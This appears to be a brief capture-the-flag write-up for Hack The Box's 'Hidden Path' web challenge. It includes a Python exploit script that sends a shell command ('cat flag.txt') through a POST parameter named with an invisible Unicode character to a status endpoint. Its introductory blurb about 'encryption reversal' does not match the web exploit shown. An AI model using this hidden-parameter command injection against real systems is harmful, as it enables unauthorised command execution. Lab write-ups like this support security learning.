HackTheBox Hidden Path Challenge
Explore the basics of cybersecurity in the Hidden Path Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/718
Description
Legends speak of the infamous Kamara-Heto, a black-hat hacker of old who rose to fame as they brought entire countries to their knees. Opinions are divided over whether the fabled figure truly existed, but the success of the team surely lies in the hope that they did, for the location of the lost vault is only known to be held on what remains of the NSA’s data centres. You have extracted the source code of a system check-up endpoint - can you find a way in? And was Kamara-Heto ever there?
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python3
from requests import post
import sys
if len(sys.argv) < 2:
print(f"Usage: python {sys.argv[0]} <ip:port>")
sys.exit(1)
URL = f'http://{sys.argv[1]}/server_status'
params = {
'choice': 6,
'\u3164': 'cat flag.txt'
}
r = post(URL, data=params)
print(r.text)
Summary
The Hidden Path Challenge on Hack The Box is an easy-level challenge that introduces participants to web exploitation and input manipulation. The challenge is centered around extracting the flag from a system by interacting with a vulnerable endpoint. By manipulating the parameters in a request, participants can bypass restrictions and access the flag. This challenge offers an introduction to basic web security concepts and request handling.